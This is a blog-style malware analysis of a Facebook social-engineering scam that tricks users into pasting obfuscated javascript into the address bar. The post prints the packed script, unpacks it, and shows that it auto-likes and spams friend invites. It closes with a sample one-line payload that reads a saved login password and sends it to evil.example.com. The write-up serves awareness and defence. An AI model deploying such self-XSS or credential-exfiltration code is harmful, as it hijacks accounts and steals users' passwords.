Facebook social engineering XSS


Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279) attempts to trick users by instructing them to type CTRL+C, to copy hidden javascript, then Alt+D to highlight the address bar to paste and run this javascript:

javascript:(function(){a='app121760014508794_iji';b='app121760014508794_aja';rew='app121760014508794_rew';qwe='app121760014508794_qwe';qtt='app121760014508794_qtt';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('P e=["\p\g\l\g\I\g\k\g\h\D","\l\h\D\k\f","\o\f\h\v\k\f\q\f\j\h\J\D\Q\x","\y\g\x\x\f\j","\g\j\j\f\z\R\K\L\S","\p\n\k\A\f","\l\A\o\o\f\l\h","\k\g\G\f\q\f","\l\k\g\j\G","\L\r\A\l\f\v\p\f\j\h\l","\t\z\f\n\h\f\v\p\f\j\h","\t\k\g\t\G","\g\j\g\h\v\p\f\j\h","\x\g\l\u\n\h\t\y\v\p\f\j\h","\l\f\k\f\t\h\w\n\k\k","\l\o\q\w\g\j\p\g\h\f\w\T\r\z\q","\H\n\U\n\V\H\l\r\t\g\n\k\w\o\z\n\u\y\H\g\j\p\g\h\f\w\x\g\n\k\r\o\W\u\y\u","\l\A\I\q\g\h\X\g\n\k\r\o","\g\j\u\A\h","\o\f\h\v\k\f\q\f\j\h\l\J\D\K\n\o\Y\n\q\f","\Z\y\n\z\f","\u\r\u\w\t\r\j\h\f\j\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000'.split('|'),0,{}))})();

______________________________________

Looks like the "Dean Edwards packing tool" And according to http://www.strictly-software.com/unpacker here is the unpacked code:
______________________________________

var variables = ["x76x69x73x69x62x69x6Cx69x74x79", "x73x74x79x6Cx65", "x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64", "x68x69x64x64x65x6E", "x69x6Ex6Ex65x72x48x54x4Dx4C", "x76x61x6Cx75x65", "x73x75x67x67x65x73x74", "x6Cx69x6Bx65x6Dx65", "x73x6Cx69x6Ex6B", "x4Dx6Fx75x73x65x45x76x65x6Ex74x73", "x63x72x65x61x74x65x45x76x65x6Ex74", "x63x6Cx69x63x6B", "x69x6Ex69x74x45x76x65x6Ex74", "x64x69x73x70x61x74x63x68x45x76x65x6Ex74", "x73x65x6Cx65x63x74x5Fx61x6Cx6C", "x73x67x6Dx5Fx69x6Ex76x69x74x65x5Fx66x6Fx72x6D", "x2Fx61x6Ax61x78x2Fx73x6Fx63x69x61x6Cx5Fx67x72x61x70x68x2Fx69x6Ex76x69x74x65x5Fx64x69x61x6Cx6Fx67x2Ex70x68x70", "x73x75x62x6Dx69x74x44x69x61x6Cx6Fx67", "x69x6Ex70x75x74", "x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65", "x53x68x61x72x65", "x70x6Fx70x5Fx63x6Fx6Ex74x65x6Ex74"];
d = document;
d[variables[2]](qtt)[variables[1]][variables[0]] = variables[3];
d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
s = d[variables[2]](variables[6]);
m = d[variables[2]](variables[7]);
sl = d[variables[2]](variables[8]);
c = d[variables[10]](variables[9]);
c[variables[12]](variables[11], true, true);
s[variables[13]](c);
setTimeout(function () {
fs[variables[14]]()
},
5000);
setTimeout(function () {
SocialGraphManager[variables[17]](variables[15], variables[16]);
setTimeout(function () {
c[variables[12]](variables[11], true, true);
sl[variables[13]](c);
setTimeout(function () {
inp = document[variables[19]](variables[18]);
for (i in inp) {
if (inp[i][variables[5]] == variables[20]) {
inp[i][variables[13]](c)
}
};
m[variables[13]](c);
setTimeout(function () {
d[variables[2]](qwe)[variables[4]] = d[variables[2]](rew)[variables[5]];
},
2000)
},
4000)
},
3000)
},
5000);

______________________________________

After writing a few js lines in firebug to dehex the variables:

outputstring="[";
for(var i=0;i<variables.length;i++)
outputstring+="""+variables[i]+"", ";alert(outputstring);

we get:

var variables = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "suggest", "likeme", "slink", "MouseEvents", "createEvent", "click", "initEvent", "dispatchEvent", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "input", "getElementsByTagName", "Share", "pop_content"];

and substitute the variables in the source:

for(var i=0;i<variables.length;i++)
src=src.replace(new RegExp('variables\['+i+'\]','g'), '"'+variables[i]+'"')

we get a well-deobfuscated source:
______________________________________

d = document;
d["getElementById"](qtt)["style"]["visibility"] = "hidden";
d["getElementById"](a)["innerHTML"] = d["getElementById"](b)["value"];
s = d["getElementById"]("suggest");
m = d["getElementById"]("likeme");
sl = d["getElementById"]("slink");
c = d["createEvent"]("MouseEvents");
c["initEvent"]("click", true, true);
s["dispatchEvent"](c);
setTimeout(function () {
fs["select_all"]()
},
5000);
setTimeout(function () {
SocialGraphManager["submitDialog"]("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
setTimeout(function () {
c["initEvent"]("click", true, true);
sl["dispatchEvent"](c);
setTimeout(function () {
inp = document["getElementsByTagName"]("input");
for (i in inp) {
if (inp[i]["value"] == "Share") {
inp[i]["dispatchEvent"](c)
}
};
m["dispatchEvent"](c);
setTimeout(function () {
d["getElementById"](qwe)["innerHTML"] = d["getElementById"](rew)["value"];
},
2000)
},
4000)
},
3000)
},5000);

Which clearly invokes, by simulated mouse click, liking the app and suggesting the app to all your friends. It could be worse, and steal your password if you have it saved on the login page:

javascript:(function(){var ifr = document.createElement(“iframe”);ifr.src=”/login.php”;ifr.height=0;ifr.width=0;document.body.appendChild(ifr);setTimeout(function(){var mypass=ifr.contentWindow.document.getElementById(“pass”).value;new Image().src=”http://evil.example.com/evil.php?pass=”+mypass;alert(“Your password is “+mypass+” and I just sent it to evil.example.com”);},1000);})();

or send you exploits or defriend all your friends… Maybe people will use this as a learning opportunity so if something actually bad does happen, they won’t get hit.

Comments are closed.